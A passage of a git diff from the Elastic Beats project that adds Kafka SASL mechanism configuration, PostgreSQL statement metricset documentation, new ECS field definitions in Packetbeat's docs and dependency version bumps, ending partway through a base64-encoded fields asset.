cfg.Net.SASL.Password = settings.Password + settings.Sasl.ConfigureSarama(cfg) } cfg.Version, _ = settings.Version.Get() diff --git a/metricbeat/module/kafka/config.go b/metricbeat/module/kafka/config.go index 8d42af9982b..e3e4aa11866 100644 --- a/metricbeat/module/kafka/config.go +++ b/metricbeat/module/kafka/config.go @@ -21,6 +21,7 @@ import ( "fmt" "time" + "github.com/elastic/beats/v7/libbeat/common/kafka" "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" ) @@ -31,6 +32,7 @@ type metricsetConfig struct { Username string `config:"username"` Password string `config:"password"` ClientID string `config:"client_id"` + Sasl kafka.SaslConfig `config:"sasl"` } var defaultConfig = metricsetConfig{ diff --git a/metricbeat/module/kafka/metricset.go b/metricbeat/module/kafka/metricset.go index 5ec46332b35..ee46788f0f9 100644 --- a/metricbeat/module/kafka/metricset.go +++ b/metricbeat/module/kafka/metricset.go @@ -64,6 +64,7 @@ func NewMetricSet(base mb.BaseMetricSet, options MetricSetOptions) (*MetricSet, Username: config.Username, Password: config.Password, Version: Version(options.Version), + Sasl: config.Sasl, } return &MetricSet{ diff --git a/metricbeat/module/kubernetes/_meta/terraform/eks/requirements.txt b/metricbeat/module/kubernetes/_meta/terraform/eks/requirements.txt index 3d918ee911a..d1a2239bbcb 100644 --- a/metricbeat/module/kubernetes/_meta/terraform/eks/requirements.txt +++ b/metricbeat/module/kubernetes/_meta/terraform/eks/requirements.txt @@ -5,7 +5,7 @@ docutils==0.15.2 jmespath==0.9.5 pyasn1==0.4.8 python-dateutil==2.8.1 -PyYAML==5.3.1 +PyYAML==5.4.1 rsa==3.4.2 s3transfer==0.3.3 six==1.14.0 diff --git a/metricbeat/module/logstash/logstash_integration_test.go b/metricbeat/module/logstash/logstash_integration_test.go index ffaed41a4e6..42173442efc 100644 --- a/metricbeat/module/logstash/logstash_integration_test.go +++ b/metricbeat/module/logstash/logstash_integration_test.go @@ -25,6 +25,7 @@ import ( "net/http" "testing" + "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/tests/compose" @@ -84,14 +85,20 @@ func TestXPackEnabled(t *testing.T) { config := getXPackConfig(lsService.Host()) metricSets := mbtest.NewReportingMetricSetV2Errors(t, config) for _, metricSet := range metricSets { - events, errs := mbtest.ReportingFetchV2Error(metricSet) - require.Empty(t, errs) - require.NotEmpty(t, events) - - event := events[0] - require.Equal(t, metricSetToTypeMap[metricSet.Name()], event.RootFields["type"]) - require.Equal(t, clusterUUID, event.RootFields["cluster_uuid"]) - require.Regexp(t, `^.monitoring-logstash-\d-mb`, event.Index) + t.Run(metricSet.Name(), func(t *testing.T) { + events, errs := mbtest.ReportingFetchV2Error(metricSet) + require.Empty(t, errs) + require.NotEmpty(t, events) + + event := events[0] + assert.Equal(t, metricSetToTypeMap[metricSet.Name()], event.RootFields["type"]) + assert.Equal(t, clusterUUID, event.RootFields["cluster_uuid"]) + assert.Regexp(t, `^.monitoring-logstash-\d-mb`, event.Index) + + if t.Failed() { + t.Logf("event: %+v", event) + } + }) } } diff --git a/metricbeat/module/postgresql/_meta/config.reference.yml b/metricbeat/module/postgresql/_meta/config.reference.yml index f27874eee36..3b4ed4579d1 100644 --- a/metricbeat/module/postgresql/_meta/config.reference.yml +++ b/metricbeat/module/postgresql/_meta/config.reference.yml @@ -10,6 +10,10 @@ # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/module/postgresql/statement/_meta/docs.asciidoc b/metricbeat/module/postgresql/statement/_meta/docs.asciidoc index 6c188dce2d9..20f295c1170 100644 --- a/metricbeat/module/postgresql/statement/_meta/docs.asciidoc +++ b/metricbeat/module/postgresql/statement/_meta/docs.asciidoc @@ -1 +1,41 @@ This is the `statement` metricset of the PostgreSQL module. + +This module collects information from the `pg_stat_statements` view, that keeps +track of planning and execution statistics of all SQL statements executed by +the server. + +`pg_stat_statements` is included by an additional module in PostgreSQL. This +module requires additional shared memory, and is disabled by default. + +You can enable it by adding this module to the configuration as a shared +preloaded library. + +["source"] +------------------------------------------- +shared_preload_libraries = 'pg_stat_statements' +pg_stat_statements.max = 10000 +pg_stat_statements.track = all +------------------------------------------- + +NOTE: Preloading this library in your server will increase the memory usage of +your PostgreSQL server. Use it with care. + +Once the server is started with this module, it starts collecting statistics +about all statements executed. To make these statistics available in the +`pg_stat_statements` view, the following statement needs to be executed in the +server: + +["source","sql"] +------------------------------------------- +CREATE EXTENSION pg_stat_statements; +------------------------------------------- + +You can read more about the available options for this module in the +https://www.postgresql.org/docs/13/pgstatstatements.html[official documentation]. + +NOTE: The PostgreSQL module of Filebeat is also able to collect information +about statements executed in the server from its logs. You may chose which one +is better for your needings. An important difference is that the Metricbeat +module collects aggregated information when the statement is executed several +times, but cannot know when each statement was executed. This information can be +obtained from logs. diff --git a/metricbeat/modules.d/kafka.yml.disabled b/metricbeat/modules.d/kafka.yml.disabled index 089e722028c..1e0db5d517b 100644 --- a/metricbeat/modules.d/kafka.yml.disabled +++ b/metricbeat/modules.d/kafka.yml.disabled @@ -33,6 +33,10 @@ #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: diff --git a/packetbeat/Dockerfile b/packetbeat/Dockerfile index 416f99f900d..fa09b50a228 100644 --- a/packetbeat/Dockerfile +++ b/packetbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/packetbeat/README.md b/packetbeat/README.md index fb164d1dc49..fcda826edbf 100644 --- a/packetbeat/README.md +++ b/packetbeat/README.md @@ -13,7 +13,7 @@ For each transaction, the shipper inserts a JSON document into Elasticsearch, where it is stored and indexed. You can then use Kibana to view key metrics and do ad-hoc queries against the data. -To learn more about Packetbeat, check out . +To learn more about Packetbeat, check out . ## Getting started diff --git a/packetbeat/cmd/root.go b/packetbeat/cmd/root.go index e2fbb373d2f..5a9d0d4f91e 100644 --- a/packetbeat/cmd/root.go +++ b/packetbeat/cmd/root.go @@ -37,7 +37,7 @@ const ( Name = "packetbeat" // ecsVersion specifies the version of ECS that Packetbeat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/packetbeat/docs/fields.asciidoc b/packetbeat/docs/fields.asciidoc index 2315a70bb9b..22e6a15621a 100644 --- a/packetbeat/docs/fields.asciidoc +++ b/packetbeat/docs/fields.asciidoc @@ -508,6 +508,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cassandra]] == Cassandra fields @@ -2385,6 +2394,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -2442,6 +2462,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -2464,6 +2496,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -2477,9 +2520,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -2794,6 +2840,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -2811,6 +2869,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -2834,6 +2904,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -3000,6 +3082,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -3057,6 +3150,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -3079,6 +3184,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -3092,9 +3208,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -3313,6 +3432,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -3336,6 +3467,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -3396,6 +3539,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -4141,6 +4293,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -4164,6 +4328,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -4312,6 +4488,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -4802,6 +4987,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -4859,6 +5055,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -4881,6 +5089,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -4918,8 +5137,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -4958,6 +5178,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -4976,6 +5205,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -4999,6 +5257,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -5056,6 +5325,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -5078,6 +5359,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -5111,10 +5403,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -5127,6 +5422,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -5404,6 +5735,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -5937,7 +6280,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -6001,7 +6344,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -6020,6 +6363,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -6077,6 +6431,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -6099,6 +6465,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -6111,7 +6488,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -6175,7 +6552,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -6195,10 +6572,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -6768,6 +7148,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -6791,6 +7183,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -6913,6 +7317,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -6967,6 +7380,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -6990,6 +7415,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -7112,6 +7549,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -7850,6 +8296,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -7907,6 +8364,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -7929,6 +8398,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -7942,9 +8422,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -8312,6 +8795,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -8369,6 +8863,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -8391,6 +8897,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -8404,9 +8921,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/packetbeat/flows/worker.go b/packetbeat/flows/worker.go index 2a9ca482ed3..f0080cf68d2 100644 --- a/packetbeat/flows/worker.go +++ b/packetbeat/flows/worker.go @@ -220,6 +220,12 @@ func createEvent( "category": []string{"network"}, "action": "network_flow", } + eventType := []string{"connection"} + if isOver { + eventType = append(eventType, "end") + } + event["type"] = eventType + flow := common.MapStr{ "id": common.NetString(f.id.Serialize()), "final": isOver, diff --git a/packetbeat/include/fields.go b/packetbeat/include/fields.go index 9b5aa85f182..0b96fcbb14b 100644 --- a/packetbeat/include/fields.go +++ b/packetbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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